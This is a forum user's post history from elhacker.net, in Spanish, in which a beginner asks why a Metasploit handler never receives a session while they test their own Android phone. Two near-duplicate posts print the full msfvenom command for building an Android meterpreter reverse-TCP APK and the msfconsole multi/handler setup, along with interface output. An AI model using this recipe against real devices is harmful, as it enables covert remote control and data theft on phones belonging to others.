elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Hacking / Re: kali linux test vulnerabilidad en mi movil problemas al iniciar exploit en: 15 Noviembre 2017, 00:51 am
Gracias lo haré.
2  Seguridad Informática / Hacking / Re: kali linux test vulnerabilidad en mi movil problemas al iniciar exploit en: 9 Noviembre 2017, 00:11 am
Perdona estoy empezando en esto y quiero aprender, cuando hablo de dos ip me refiero a la ip local , que empieza por 192. etc. , el objetivo es mi movil, esta conectado a la misma wifi y otras lo tengo solo conectado a la red. Lo estoy haciendo desde virtual box. Que mas datos de puedo dar?


eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        ether 08:00:27:f1:fc:39  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 158  bytes 27732 (27.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 404  bytes 31828 (31.0 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 404  bytes 31828 (31.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.0.203  netmask 255.255.255.0  broadcast 192.168.0.255
        inet6 fe80::80f4:c290:e05c:d1a  prefixlen 64  scopeid 0x20<link>
        ether 94:10:3e:ac:df:29  txqueuelen 1000  (Ethernet)
        RX packets 17289  bytes 13937479 (13.2 MiB)
        RX errors 0  dropped 5072  overruns 0  frame 0
        TX packets 15172  bytes 2466021 (2.3 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
3  Seguridad Informática / Hacking / kali linux test vulnerabilidad en mi movil problemas al iniciar exploit en: 8 Noviembre 2017, 10:56 am
Hola, tengo un problema en Kali linux, estoy haciendo pruebas de seguridad en mi movil, :

root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.xxxLPORT=5432 R > android.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8809 bytes

root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
   Is the server running on host "localhost" (::1) and accepting
   TCP/IP connections on port 5432?
could not connect to server: Connection refused
   Is the server running on host "localhost" (127.0.0.1) and accepting
   TCP/IP connections on port 5432?

# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v4.16.13-dev                         ]
+ -- --=[ 1697 exploits - 969 auxiliary - 299 post        ]
+ -- --=[ 500 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.xxx.xx.xxx
LHOST => 192.xxx.x.xxx
msf exploit(handler) > set LPORT 5432
LPORT => 5432
msf exploit(handler) > exploit
  • Exploit running as background job 0.
  • Started reverse TCP handler on 192.xx.xxx:5432
msf exploit(handler) >



Bien al escribir el comando exploit el problema aparece cuando se queda aqui y no continua.


  • Started reverse TCP handler on 192.xxx.x.xxx:5432
msf exploit(handler) >

Deberia aparecer otra linea en espera de activar en mi movil el archivo apk pero no aparece, no se que estoy haciendo mal.

Tambien he probado utilizando otra ip :
msf exploit(handler) > set LHOST 127.0.0.1
LHHOST => 127.0.0.1
msf exploit(handler) > set LPORT 5432
LPORT => 5432

Pero el resultado es este:

[-] Exploit failed: The following options failed to validate: LHOST.
  • Exploit completed, but no session was created.



Espero que alguien pueda ayudarme. Gracias
4  Sistemas Operativos / GNU/Linux / kali linux problema test seguridad android en: 6 Noviembre 2017, 11:54 am
Hola, tengo un problema en Kali linux, estoy haciendo pruebas de seguridad en mi movil, :

root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.xxxLPORT=5432 R > android.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8809 bytes

root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
   Is the server running on host "localhost" (::1) and accepting
   TCP/IP connections on port 5432?
could not connect to server: Connection refused
   Is the server running on host "localhost" (127.0.0.1) and accepting
   TCP/IP connections on port 5432?

# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v4.16.13-dev                         ]
+ -- --=[ 1697 exploits - 969 auxiliary - 299 post        ]
+ -- --=[ 500 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.xxx.xx.xxx
LHOST => 192.xxx.x.xxx
msf exploit(handler) > set LPORT 5432
LPORT => 5432
msf exploit(handler) > exploit
  • Exploit running as background job 0.
  • Started reverse TCP handler on 192.xx.xxx:5432
msf exploit(handler) >



Bien al escribir el comando exploit el problema aparece cuando se queda aqui y no continua.


  • Started reverse TCP handler on 192.xxx.x.xxx:5432
msf exploit(handler) >

Deberia aparecer otra linea en espera de activar en mi movil el archivo apk pero no aparece, no se que estoy haciendo mal.

Tambien he probado utilizando otra ip :
msf exploit(handler) > set LHOST 127.0.0.1
LHHOST => 127.0.0.1
msf exploit(handler) > set LPORT 5432
LPORT => 5432

Pero el resultado es este:

[-] Exploit failed: The following options failed to validate: LHOST.
  • Exploit completed, but no session was created.



Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines